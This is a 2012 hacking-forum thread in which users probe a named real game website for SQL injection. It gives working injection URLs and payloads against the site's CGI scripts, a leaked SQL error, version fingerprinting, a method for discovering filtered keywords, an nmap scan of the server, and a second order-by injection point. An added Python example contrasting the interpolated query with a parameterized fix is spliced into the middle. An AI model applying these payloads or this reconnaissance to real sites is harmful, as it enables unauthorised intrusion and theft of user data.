Author Topic: Site injectable?  (Read 2087 times)


Offline fr0wnR

  • /dev/null
  • Posts: 12
  • Cookies: 0
Site injectable?
« on: December 10, 2012, 06:26:34 pm »
www.tantrix.com/cgi-bin/forgot_name.cgi?pname='or 1=1; --
This works, I'm getting a sql error:
Quote
Error SELECT uid,player_name,e_mail,country,date_joined FROM players where player_name like '%'or 1=1-%' ORDER BY date_joined DESC: (67.159.36.26 /cgi-bin/forgot_name.cgi?pname='or%201=1- : execute) You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%' ORDER BY date_joined DESC' at line 1


Now I'm trying to get e.g. the version (with @@version), but then I'm getting to a forbidden page. Does this simply mean that it's not injectable or am I doing something wrong?


This would be my idea with @@version:
Quote
tantrix.com/cgi-bin/forgot_name.cgi?pname=test%'; SELECT @@version; --
The SQL query then:
Quote
SELECT uid,player_name,e_mail,country,date_joined FROM players where player_name like '%test%'; SELECT @@version; -- the rest commented out
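The query quoted above is built by pasting the `pname` parameter straight into the SQL text, which is why a single quote ends the LIKE literal and the rest of the input becomes SQL. The following is an added example (not code from the thread or from the site being discussed) that reproduces that construction against a constructed in-memory SQLite table with the same column names, and sets it beside the parameterized form a defender would ship. The table contents, the `handle_request` wrapper and the generic error string are assumptions made for the example.

```python
import sqlite3

# Constructed sample table; column names mirror the ones in the quoted error message.
SAMPLE_PLAYERS = [
    (1, "alice", "alice@example.invalid", "DE", "2010-03-01"),
    (2, "bob", "bob@example.invalid", "NZ", "2011-07-15"),
    (3, "carol", "carol@example.invalid", "ES", "2012-01-20"),
]

COLUMNS = "uid,player_name,e_mail,country,date_joined"


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE players (uid INTEGER, player_name TEXT, e_mail TEXT, "
        "country TEXT, date_joined TEXT)"
    )
    conn.executemany("INSERT INTO players VALUES (?,?,?,?,?)", SAMPLE_PLAYERS)
    return conn


def vulnerable_lookup(conn, pname):
    # The defect: user input is interpolated into the SQL text, so a quote in
    # pname terminates the LIKE literal and the remainder is parsed as SQL.
    sql = (
        f"SELECT {COLUMNS} FROM players "
        f"WHERE player_name LIKE '%{pname}%' ORDER BY date_joined DESC"
    )
    return conn.execute(sql).fetchall()


def safe_lookup(conn, pname):
    # The fix: the value travels as a bound parameter, never as SQL text.
    # LIKE wildcards in the input are escaped too, so a user cannot widen the
    # match to every row just by sending "%".
    escaped = (
        pname.replace("\\", "\\\\").replace("%", "\\%").replace("_", "\\_")
    )
    sql = (
        f"SELECT {COLUMNS} FROM players "
        "WHERE player_name LIKE ? ESCAPE '\\' ORDER BY date_joined DESC"
    )
    return conn.execute(sql, (f"%{escaped}%",)).fetchall()


def handle_request(conn, pname, lookup=safe_lookup):
    # Assumed request wrapper: the database error text is kept server-side.
    # Echoing it to the client is what leaked the MySQL version in the thread.
    try:
        rows = lookup(conn, pname)
    except sqlite3.Error as exc:
        print(f"[server log] lookup failed for {pname!r}: {exc}")
        return {"ok": False, "error": "lookup failed"}
    return {"ok": True, "rows": rows}


if __name__ == "__main__":
    db = make_db()
    tampered = "' OR 1=1 --"
    print("interpolated:", len(vulnerable_lookup(db, tampered)), "rows")  # every row
    print("parameterized:", len(safe_lookup(db, tampered)), "rows")     # no rows
    print(handle_request(db, "' OR 1=1-", lookup=vulnerable_lookup))    # generic error
```

With the interpolated query the tampered value returns the whole table, the parameterized query treats the same bytes as a name nobody has, and the malformed variant from the thread (a single trailing dash) produces a syntax error that the wrapper logs instead of returning.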




Offline ande

  • Owner
  • Titan
  • Posts: 2664
  • Cookies: 256
Re: Site injectable?
« Reply #1 on: December 10, 2012, 06:44:33 pm »
Forbidden pages usually mean some sort of filtering. Tried @@vErSion? :)
if($statement) { unless(!$statement) { // Very sure } }
https://evilzone.org/?hack=true

Offline fr0wnR

  • /dev/null
  • Posts: 12
  • Cookies: 0
Re: Site injectable?
« Reply #2 on: December 10, 2012, 07:02:50 pm »
Quote
Forbidden pages usually means some sort of filtering. Tried @@vErSion? :)
Hmm, doesn't work either..
I will try encoding it, but I don't think this will change anything.
Is it really not injectable??

Offline peak

  • Serf
  • Posts: 26
  • Cookies: 0
Re: Site injectable?
« Reply #3 on: December 10, 2012, 07:18:44 pm »
Without trying myself I can already say:
Quote
....  that corresponds to your MySQL server version for ...
...got it?

Offline fr0wnR

  • /dev/null
  • Posts: 12
  • Cookies: 0
Re: Site injectable?
« Reply #4 on: December 10, 2012, 07:37:51 pm »
Wait this is genius  :D
They have MySQL 5.0.91-community.
Will read through the changes, thank you!
« Last Edit: December 10, 2012, 07:43:39 pm by fr0wnR »

Offline peak

  • Serf
  • Posts: 26
  • Cookies: 0
Re: Site injectable?
« Reply #5 on: December 10, 2012, 07:54:40 pm »
Well I took a deeper look at the vulnerability.

It is indeed injectable. But there is a simple WAF aka filtering going on. It's just the select keyword "from" that gets filtered and /etc/passwd as I noticed, but nothing else so far.

Conclusion: You cannot bypass the keyword "from" and you don't have file privileges. You can extract the information about the player table with the given Select statement, but besides that there is no exploitation by sqli possible on this parameter.

Apache is 1.3.41 though ...

cheers
« Last Edit: December 10, 2012, 07:55:41 pm by peak »

Offline fr0wnR

  • /dev/null
  • Posts: 12
  • Cookies: 0
Re: Site injectable?
« Reply #6 on: December 10, 2012, 08:08:53 pm »
Thank you for the nice explanation!
How did you find out which keywords are getting filtered out? Just trying or software?
And yeah, the whole software set is old on their server.
Quote
Starting Nmap 5.00 ( http://nmap.org ) at 2012-12-02 22:48 CET
 Interesting ports on 69.36.8.247:
 Not shown: 976 closed ports
 PORT STATE SERVICE VERSION
 21/tcp open ftp ProFTPD 1.3.3c
 22/tcp open ssh OpenSSH 3.9p1 (protocol 1.99)
 25/tcp open smtp Courier smtpd
 26/tcp open smtp Courier smtpd
 53/tcp open domain ISC BIND 9.2.4
 80/tcp open http Apache httpd 1.3.41 ((Unix) PHP/5.2.14 FrontPage/5.0.2.2510 mod_ssl/2.8.31 OpenSSL/0.9.7a)
 110/tcp open pop3 Courier pop3d
 135/tcp filtered msrpc
 139/tcp filtered netbios-ssn
 143/tcp open imap Courier Imapd (released 2010)
 443/tcp open http Apache httpd 1.3.41 ((Unix) PHP/5.2.14 FrontPage/5.0.2.2510 mod_ssl/2.8.31 OpenSSL/0.9.7a)
 445/tcp filtered microsoft-ds
 587/tcp open smtp Courier smtpd
 993/tcp open ssl/imaps?
 995/tcp open ssl/pop3s?
 3000/tcp open http ServerCP httpd
 3001/tcp open http Apache httpd 1.3.41 ((Unix) PHP/5.2.14 FrontPage/5.0.2.2510 mod_ssl/2.8.31 OpenSSL/0.9.7a)
 3306/tcp open mysql MySQL 5.0.91-community
 4321/tcp open http Apache httpd 1.3.41 ((Unix) PHP/5.2.14 FrontPage/5.0.2.2510 mod_ssl/2.8.31 OpenSSL/0.9.7a)
 5432/tcp open postgresql PostgreSQL DB
 6666/tcp filtered irc
 6667/tcp filtered irc
 6668/tcp filtered irc
 6669/tcp filtered irc
 Service Info: Host: server2.tantrix.com; OS: Unix


Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
 Nmap done: 1 IP address (1 host up) scanned in 30.78 seconds


Offline peak

  • Serf
  • Posts: 26
  • Cookies: 0
Re: Site injectable?
« Reply #7 on: December 10, 2012, 08:48:16 pm »
Quote
How did you find out which keywords are getting filtered out? Just trying or software?

Comment out the rest of the string and type your keywords into the comment part.

... 1,2,3,4,5 -- xx  from

By the way: Just by clicking around I already found an orderby injection:

http://www.tantrix.com/cgi-bin/gs_rankings2.cgi?order-by=ranking2'&country=Spain
« Last Edit: December 10, 2012, 08:48:50 pm by peak »